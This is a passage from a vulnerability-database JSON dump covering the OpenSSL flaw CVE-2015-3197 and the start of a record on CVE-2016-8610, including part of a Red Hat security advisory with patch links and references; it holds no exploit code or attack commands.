"id": "135596" }, { "db": "PACKETSTORM", "id": "136032" }, { "db": "PACKETSTORM", "id": "135515" }, { "db": "PACKETSTORM", "id": "136034" }, { "db": "PACKETSTORM", "id": "136132" }, { "db": "PACKETSTORM", "id": "169661" }, { "db": "CNNVD", "id": "CNNVD-201602-026" }, { "db": "NVD", "id": "CVE-2015-3197" } ] }, "id": "VAR-201602-0272", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.535906682 }, "last_update_date": "2024-07-23T21:05:01.067000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "HS16-015", "trust": 0.8, "url": "http://www.hitachi.co.jp/prod/comp/soft1/global/security/info/vuls/hs16-015/index.html" }, { "title": "NV16-007", "trust": 0.8, "url": "http://jpn.nec.com/security-info/secinfo/nv16-007.html" }, { "title": "LibreSSL 2.3.2 Release Notes", "trust": 0.8, "url": "http://ftp.openbsd.org/pub/openbsd/libressl/libressl-2.3.2-relnotes.txt" }, { "title": "LibreSSL 2.2.6 Release Notes", "trust": 0.8, "url": "http://ftp.openbsd.org/pub/openbsd/libressl/libressl-2.2.6-relnotes.txt" }, { "title": "Better SSLv2 cipher-suite enforcement", "trust": 0.8, "url": "https://git.openssl.org/?p=openssl.git;a=commit;h=d81a1600588b726c2bdccda7efad3cc7a87d6245" }, { "title": "SSLv2 doesn\u0027t block disabled ciphers (CVE-2015-3197)", "trust": 0.8, "url": "https://mta.openssl.org/pipermail/openssl-announce/2016-january/000061.html" }, { "title": "Oracle Critical Patch Update CVSS V2 Risk Matrices - April 2016", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/cpuapr2016-2881694.html" }, { "title": "Oracle Critical Patch Update Advisory - July 2016", "trust": 0.8, "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html" }, { "title": "Text Form of Oracle Critical Patch Update - April 2016 Risk Matrices", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/cpuapr2016verbose-2881709.html" }, { "title": "Oracle Critical Patch Update Advisory - October 2016", "trust": 0.8, "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html" }, { "title": "Text Form of Oracle Critical Patch Update - October 2016 Risk Matrices", "trust": 0.8, "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2016verbose-2881725.html" }, { "title": "Text Form of Oracle Critical Patch Update - July 2016 Risk Matrices", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/cpujul2016verbose-2881721.html" }, { "title": "Oracle Critical Patch Update Advisory - April 2016", "trust": 0.8, "url": "http://www.oracle.com/technetwork/security-advisory/cpuapr2016v3-2985753.html" }, { "title": "Oracle Linux Bulletin - January 2016", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinjan2016-2867209.html" }, { "title": "Oracle Solaris Third Party Bulletin - January 2016", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/bulletinjan2016-2867206.html" }, { "title": "Oracle VM Server for x86 Bulletin - July 2016", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/ovmbulletinjul2016-3090546.html" }, { "title": "April 2016 Critical Patch Update Released", "trust": 0.8, "url": "https://blogs.oracle.com/security/entry/april_2016_critical_patch_update" }, { "title": "October 2016 Critical Patch Update Released", "trust": 0.8, "url": "https://blogs.oracle.com/security/entry/october_2016_critical_patch_update" }, { "title": "July 2016 Critical Patch Update Released", "trust": 0.8, "url": "https://blogs.oracle.com/security/entry/july_2016_critical_patch_update" }, { "title": "TLSA-2016-6", "trust": 0.8, "url": "http://www.turbolinux.co.jp/security/2016/tlsa-2016-6j.html" }, { "title": "HS16-015", "trust": 0.8, "url": "http://www.hitachi.co.jp/prod/comp/soft1/security/info/vuls/hs16-015/index.html" }, { "title": "OpenSSL Security vulnerabilities", "trust": 0.6, "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=60033" }, { "title": "The Register", "trust": 0.2, "url": "https://www.theregister.co.uk/2016/01/29/openssl_patch_quashes_rare_https_nasty_shores_up_crypto_chops/" }, { "title": "Red Hat: CVE-2015-3197", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2015-3197" }, { "title": "Cisco: Multiple Vulnerabilities in OpenSSL (January 2016) Affecting Cisco Products", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=cisco-sa-20160129-openssl" }, { "title": "Amazon Linux AMI: ALAS-2016-682", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2016-682" }, { "title": "Symantec Security Advisories: SA111 : OpenSSL Vulnerabilities 28-Jan-2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=symantec_security_advisories\u0026qid=83d562565218abbdbef42ef8962d127b" }, { "title": "Amazon Linux AMI: ALAS-2016-661", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2016-661" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - October 2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=523d3f220a64ff01dd95e064bd37566a" }, { "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - January 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=eb439566c9130adc92d21bc093204cf8" }, { "title": "Oracle VM Server for x86 Bulletins: Oracle VM Server for x86 Bulletin - July 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_vm_server_for_x86_bulletins\u0026qid=6c15273f6bf4a785175f27073b98a1ce" }, { "title": "Oracle Linux Bulletins: Oracle Linux Bulletin - January 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_linux_bulletins\u0026qid=8ad80411af3e936eb2998df70506cc71" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - October 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=05aabe19d38058b7814ef5514aab4c0c" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - July 2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=2f446a7e1ea263c0c3a365776c6713f2" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - April 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=122319027ae43d6d626710f1b1bb1d43" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - July 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=3a04485ebb79f7fbc2472bf9af5ce489" }, { "title": "", "trust": 0.1, "url": "https://github.com/live-hack-cve/cve-2015-3197 " }, { "title": "changelog", "trust": 0.1, "url": "https://github.com/halon/changelog " }, { "title": "", "trust": 0.1, "url": "https://github.com/imhunterand/hackerone-publicy-disclosed " }, { "title": "satellite-host-cve", "trust": 0.1, "url": "https://github.com/redhatsatellite/satellite-host-cve " } ], "sources": [ { "db": "VULMON", "id": "CVE-2015-3197" }, { "db": "JVNDB", "id": "JVNDB-2015-006985" }, { "db": "CNNVD", "id": "CNNVD-201602-026" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-310", "trust": 1.8 }, { "problemtype": "CWE-200", "trust": 1.8 }, { "problemtype": "CWE-Other", "trust": 0.8 } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2015-006985" }, { "db": "NVD", "id": "CVE-2015-3197" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.9, "url": "https://www.kb.cert.org/vuls/id/257823" }, { "trust": 2.0, "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html" }, { "trust": 2.0, "url": "http://www.oracle.com/technetwork/topics/security/ovmbulletinjul2016-3090546.html" }, { "trust": 2.0, "url": "http://www.oracle.com/technetwork/topics/security/bulletinjan2016-2867206.html" }, { "trust": 2.0, "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html" }, { "trust": 1.8, "url": "http://www.openssl.org/news/secadv/20160128.txt" }, { "trust": 1.8, "url": "https://security.gentoo.org/glsa/201601-05" }, { "trust": 1.7, "url": "http://www.oracle.com/technetwork/security-advisory/cpuapr2016v3-2985753.html" }, { "trust": 1.7, "url": "http://www.securityfocus.com/bid/91787" }, { "trust": 1.7, "url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinjan2016-2867209.html" }, { "trust": 1.7, "url": "http://www.securityfocus.com/bid/82237" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00015.html" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00017.html" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-03/msg00003.html" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-03/msg00010.html" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-03/msg00007.html" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-03/msg00009.html" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-03/msg00001.html" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-03/msg00017.html" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-03/msg00004.html" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-03/msg00025.html" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-03/msg00002.html" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-03/msg00006.html" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-03/msg00011.html" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-04/msg00038.html" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-03/msg00012.html" }, { "trust": 1.7, "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-412672.pdf" }, { "trust": 1.7, "url": "https://security.freebsd.org/advisories/freebsd-sa-16:11.openssl.asc" }, { "trust": 1.7, "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html" }, { "trust": 1.7, "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html" }, { "trust": 1.7, "url": "https://h20566.www2.hpe.com/hpsc/doc/public/display?doclocale=en_us\u0026docid=emr_na-hpesbhf03724en_us" }, { "trust": 1.7, "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05390893" }, { "trust": 1.7, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10759" }, { "trust": 1.7, "url": "http://www.securitytracker.com/id/1034849" }, { "trust": 1.7, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-january/176373.html" }, { "trust": 1.4, "url": "https://mta.openssl.org/pipermail/openssl-announce/2016-january/000061.html" }, { "trust": 1.1, "url": "https://www.openssl.org/news/vulnerabilities.html#y2016" }, { "trust": 1.1, "url": "https://git.openssl.org/?p=openssl.git%3ba=commit%3bh=d81a1600588b726c2bdccda7efad3cc7a87d6245" }, { "trust": 0.9, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-3197" }, { "trust": 0.8, "url": "http://intothesymmetry.blogspot.com/2016/01/openssl-key-recovery-attack-on-dh-small.html" }, { "trust": 0.8, "url": "http://tools.ietf.org/html/rfc5114" }, { "trust": 0.8, "url": "http://webstore.ansi.org/recorddetail.aspx?sku=ansi+x9.42-2003+%28r2013%29" }, { "trust": 0.8, "url": "https://jvn.jp/vu/jvnvu95668716/" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-3197" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3197" }, { "trust": 0.6, "url": "https://gtacknowledge.extremenetworks.com/articles/vulnerability_notice/vn-2016-002-openssl/?q=cve-2015-3197\u0026l=en_us\u0026fs=search\u0026pn=1" }, { "trust": 0.6, "url": "https://git.openssl.org/?p=openssl.git;a=commit;h=d81a1600588b726c2bdccda7efad3cc7a87d6245" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2022.0696" }, { "trust": 0.5, "url": "https://access.redhat.com/security/cve/cve-2015-3197" }, { "trust": 0.5, "url": "https://openssl.org/news/secadv/20160128.txt" }, { "trust": 0.4, "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0293" }, { "trust": 0.4, "url": "https://access.redhat.com/security/cve/cve-2015-0293" }, { "trust": 0.4, "url": "https://bugzilla.redhat.com/):" }, { "trust": 0.4, "url": "https://access.redhat.com/articles/11258" }, { "trust": 0.4, "url": "https://access.redhat.com/security/cve/cve-2016-0800" }, { "trust": 0.4, "url": "https://access.redhat.com/security/team/contact/" }, { "trust": 0.4, "url": "https://access.redhat.com/security/updates/classification/#important" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0800" }, { "trust": 0.3, "url": "http://openssl.org/" }, { "trust": 0.3, "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20160129-openssl" }, { "trust": 0.3, "url": "http://www.oracle.com/technetwork/topics/security/cpuapr2016-2881694.html" }, { "trust": 0.3, "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10203" }, { "trust": 0.3, "url": "http://aix.software.ibm.com/aix/efixes/security/openssl_advisory17.asc" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1023433" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1023836" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1023987" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5099307" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1021143" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1021265" }, { "trust": 0.3, "url": "https://www.freebsd.org/security/advisories/freebsd-sa-16:11.openssl.asc" }, { "trust": 0.3, "url": "http://rhn.redhat.com/errata/rhsa-2016-0303.html" }, { "trust": 0.3, "url": "http://rhn.redhat.com/errata/rhsa-2016-0379.html" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1024066" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1005820" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1009610" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21976345" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21976356" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21977014" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21977018" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21977144" }, { "trust": 0.3, "url": "https://www-01.ibm.com/support/docview.wss?uid=swg21978361" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21978438" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21978941" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21979086" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21979209" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21980207" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21980965" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21980969" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21981438" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21982099" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21982336" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21982697" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21984601" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21985213" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21985698" }, { "trust": 0.3, "url": "https://www-01.ibm.com/support/docview.wss?uid=swg21987174" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21987175" }, { "trust": 0.3, "url": "http://www.kb.cert.org/vuls/id/583776" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21979476" }, { "trust": 0.3, "url": "http://www.cisco.com/" }, { "trust": 0.3, "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=38591" }, { "trust": 0.3, "url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20150506-ucsc" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0701" }, { "trust": 0.3, "url": "https://access.redhat.com/articles/2176731" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0704" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2016-0704" }, { "trust": 0.3, "url": "https://openssl.org/news/secadv/20160301.txt" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2016-0703" }, { "trust": 0.3, "url": "https://drownattack.com/" }, { "trust": 0.3, "url": "https://access.redhat.com/security/team/key/" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0703" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/310.html" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/200.html" }, { "trust": 0.1, "url": "https://github.com/live-hack-cve/cve-2015-3197" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://github.com/halon/changelog" }, { "trust": 0.1, "url": "https://www.cisa.gov/uscert/ics/advisories/icsa-22-349-21" }, { "trust": 0.1, "url": "https://rhn.redhat.com/errata/rhsa-2016-0445.html" }, { "trust": 0.1, "url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?downloadtype=securitypatches\u0026product=webserver\u0026version=2.1.0" }, { "trust": 0.1, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05390893" }, { "trust": 0.1, "url": "http://www.hpe.com/support/security_bulletin_archive" }, { "trust": 0.1, "url": "https://www.hpe.com/info/report-security-vulnerability" }, { "trust": 0.1, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c01345499" }, { "trust": 0.1, "url": "http://www.hpe.com/support/subscriber_choice" }, { "trust": 0.1, "url": "http://slackware.com" }, { "trust": 0.1, "url": "http://osuosl.org)" }, { "trust": 0.1, "url": "http://slackware.com/gpg-key" }, { "trust": 0.1, "url": "https://rhn.redhat.com/errata/rhsa-2016-0304.html" }, { "trust": 0.1, "url": "http://creativecommons.org/licenses/by-sa/2.5" }, { "trust": 0.1, "url": "https://security.gentoo.org/" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-3197" }, { "trust": 0.1, "url": "https://bugs.gentoo.org." }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-0701" }, { "trust": 0.1, "url": "https://rhn.redhat.com/errata/rhsa-2016-0306.html" }, { "trust": 0.1, "url": "https://rhn.redhat.com/errata/rhsa-2016-0372.html" }, { "trust": 0.1, "url": "https://www.openssl.org/policies/secpolicy.html" }, { "trust": 0.1, "url": "https://www.openssl.org/policies/releasestrat.html)," }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-4000" } ], "sources": [ { "db": "CERT/CC", "id": "VU#257823" }, { "db": "VULMON", "id": "CVE-2015-3197" }, { "db": "BID", "id": "82237" }, { "db": "BID", "id": "74491" }, { "db": "JVNDB", "id": "JVNDB-2015-006985" }, { "db": "PACKETSTORM", "id": "136213" }, { "db": "PACKETSTORM", "id": "141101" }, { "db": "PACKETSTORM", "id": "135596" }, { "db": "PACKETSTORM", "id": "136032" }, { "db": "PACKETSTORM", "id": "135515" }, { "db": "PACKETSTORM", "id": "136034" }, { "db": "PACKETSTORM", "id": "136132" }, { "db": "PACKETSTORM", "id": "169661" }, { "db": "CNNVD", "id": "CNNVD-201602-026" }, { "db": "NVD", "id": "CVE-2015-3197" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "CERT/CC", "id": "VU#257823" }, { "db": "VULMON", "id": "CVE-2015-3197" }, { "db": "BID", "id": "82237" }, { "db": "BID", "id": "74491" }, { "db": "JVNDB", "id": "JVNDB-2015-006985" }, { "db": "PACKETSTORM", "id": "136213" }, { "db": "PACKETSTORM", "id": "141101" }, { "db": "PACKETSTORM", "id": "135596" }, { "db": "PACKETSTORM", "id": "136032" }, { "db": "PACKETSTORM", "id": "135515" }, { "db": "PACKETSTORM", "id": "136034" }, { "db": "PACKETSTORM", "id": "136132" }, { "db": "PACKETSTORM", "id": "169661" }, { "db": "CNNVD", "id": "CNNVD-201602-026" }, { "db": "NVD", "id": "CVE-2015-3197" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-01-28T00:00:00", "db": "CERT/CC", "id": "VU#257823" }, { "date": "2016-02-15T00:00:00", "db": "VULMON", "id": "CVE-2015-3197" }, { "date": "2016-01-28T00:00:00", "db": "BID", "id": "82237" }, { "date": "2015-05-06T00:00:00", "db": "BID", "id": "74491" }, { "date": "2016-03-15T00:00:00", "db": "JVNDB", "id": "JVNDB-2015-006985" }, { "date": "2016-03-14T23:44:31", "db": "PACKETSTORM", "id": "136213" }, { "date": "2017-02-15T14:19:58", "db": "PACKETSTORM", "id": "141101" }, { "date": "2016-02-04T21:45:07", "db": "PACKETSTORM", "id": "135596" }, { "date": "2016-03-02T15:44:44", "db": "PACKETSTORM", "id": "136032" }, { "date": "2016-01-29T23:23:00", "db": "PACKETSTORM", "id": "135515" }, { "date": "2016-03-02T18:33:33", "db": "PACKETSTORM", "id": "136034" }, { "date": "2016-03-09T15:25:36", "db": "PACKETSTORM", "id": "136132" }, { "date": "2016-01-28T12:12:12", "db": "PACKETSTORM", "id": "169661" }, { "date": "2016-01-28T00:00:00", "db": "CNNVD", "id": "CNNVD-201602-026" }, { "date": "2016-02-15T02:59:01.980000", "db": "NVD", "id": "CVE-2015-3197" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-01-29T00:00:00", "db": "CERT/CC", "id": "VU#257823" }, { "date": "2023-11-07T00:00:00", "db": "VULMON", "id": "CVE-2015-3197" }, { "date": "2017-12-19T22:01:00", "db": "BID", "id": "82237" }, { "date": "2016-07-21T02:00:00", "db": "BID", "id": "74491" }, { "date": "2016-11-22T00:00:00", "db": "JVNDB", "id": "JVNDB-2015-006985" }, { "date": "2022-12-14T00:00:00", "db": "CNNVD", "id": "CNNVD-201602-026" }, { "date": "2023-11-07T02:25:31.933000", "db": "NVD", "id": "CVE-2015-3197" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "PACKETSTORM", "id": "135515" }, { "db": "CNNVD", "id": "CNNVD-201602-026" } ], "trust": 0.7 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "OpenSSL re-uses unsafe prime numbers in Diffie-Hellman protocol", "sources": [ { "db": "CERT/CC", "id": "VU#257823" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "information disclosure", "sources": [ { "db": "CNNVD", "id": "CNNVD-201602-026" } ], "trust": 0.6 } }
var-201711-0007
Vulnerability from variot
A denial of service flaw was found in OpenSSL 0.9.8, 1.0.1, 1.0.2 through 1.0.2h, and 1.1.0 in the way the TLS/SSL protocol defined processing of ALERT packets during a connection handshake. A remote attacker could use this flaw to make a TLS/SSL server consume an excessive amount of CPU and fail to accept connections from other clients. OpenSSL is prone to denial-of-service vulnerability. Successful exploitation of the issue will cause excessive memory or CPU resource consumption, resulting in a denial-of-service condition. It supports a variety of encryption algorithms, including symmetric ciphers, hash algorithms, security hashing algorithm, etc. The following versions are affected: OpenSSL version 0.9.8, version 1.0.1, versions 1.0.2 through 1.0.2h, version 1.1.0. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Important: Red Hat JBoss Core Services Apache HTTP Server 2.4.23 Service Pack 1 for RHEL 7 Advisory ID: RHSA-2017:1413-01 Product: Red Hat JBoss Core Services Advisory URL: https://access.redhat.com/errata/RHSA-2017:1413 Issue date: 2017-06-07 CVE Names: CVE-2016-0736 CVE-2016-2161 CVE-2016-6304 CVE-2016-7056 CVE-2016-8610 CVE-2016-8740 CVE-2016-8743 =====================================================================
- Summary:
An update is now available for Red Hat JBoss Core Services on RHEL 7.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat JBoss Core Services on RHEL 7 Server - noarch, ppc64, x86_64
- Description:
Red Hat JBoss Core Services is a set of supplementary software for Red Hat JBoss middleware products. This software, such as Apache HTTP Server, is common to multiple JBoss middleware products, and is packaged under Red Hat JBoss Core Services to allow for faster distribution of updates, and for a more consistent update experience.
This release of Red Hat JBoss Core Services Apache HTTP Server 2.4.23 Service Pack 1 serves as a replacement for Red Hat JBoss Core Services Apache HTTP Server 2.4.23, and includes bug fixes, which are documented in the Release Notes document linked to in the References.
Security Fix(es):
-
A memory leak flaw was found in the way OpenSSL handled TLS status request extension data during session renegotiation. A remote attacker could cause a TLS server using OpenSSL to consume an excessive amount of memory and, possibly, exit unexpectedly after exhausting all available memory, if it enabled OCSP stapling support. (CVE-2016-6304)
-
It was discovered that the mod_session_crypto module of httpd did not use any mechanisms to verify integrity of the encrypted session data stored in the user's browser. (CVE-2016-0736)
-
It was discovered that the mod_auth_digest module of httpd did not properly check for memory allocation failures. (CVE-2016-2161)
-
A timing attack flaw was found in OpenSSL that could allow a malicious user with local access to recover ECDSA P-256 private keys. (CVE-2016-8610)
-
It was discovered that the HTTP parser in httpd incorrectly allowed certain characters not permitted by the HTTP protocol specification to appear unencoded in HTTP request headers. If httpd was used in conjunction with a proxy or backend server that interpreted those characters differently, a remote attacker could possibly use this flaw to inject data into HTTP responses, resulting in proxy cache poisoning. (CVE-2016-8743)
-
A vulnerability was found in httpd's handling of the LimitRequestFields directive in mod_http2, affecting servers with HTTP/2 enabled. An attacker could send crafted requests with headers larger than the server's available memory, causing httpd to crash. (CVE-2016-8740)
Red Hat would like to thank the OpenSSL project for reporting CVE-2016-6304 and Shi Lei (Gear Team of Qihoo 360 Inc.) for reporting CVE-2016-8610. Upstream acknowledges Shi Lei (Gear Team of Qihoo 360 Inc.) as the original reporter of CVE-2016-6304.
- Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
For the update to take effect, all services linked to the OpenSSL library must be restarted, or the system rebooted. After installing the updated packages, the httpd daemon will be restarted automatically.
- Bugs fixed (https://bugzilla.redhat.com/):
1377600 - CVE-2016-6304 openssl: OCSP Status Request extension unbounded memory growth 1384743 - CVE-2016-8610 SSL/TLS: Malformed plain-text ALERT packets could cause remote DoS 1401528 - CVE-2016-8740 httpd: Incomplete handling of LimitRequestFields directive in mod_http2 1406744 - CVE-2016-0736 httpd: Padding Oracle in Apache mod_session_crypto 1406753 - CVE-2016-2161 httpd: DoS vulnerability in mod_auth_digest 1406822 - CVE-2016-8743 httpd: Apache HTTP Request Parsing Whitespace Defects 1412120 - CVE-2016-7056 openssl: ECDSA P-256 timing attack key recovery
- JIRA issues fixed (https://issues.jboss.org/):
JBCS-319 - Errata for httpd 2.4.23 SP1 RHEL 7
- Package List:
Red Hat JBoss Core Services on RHEL 7 Server:
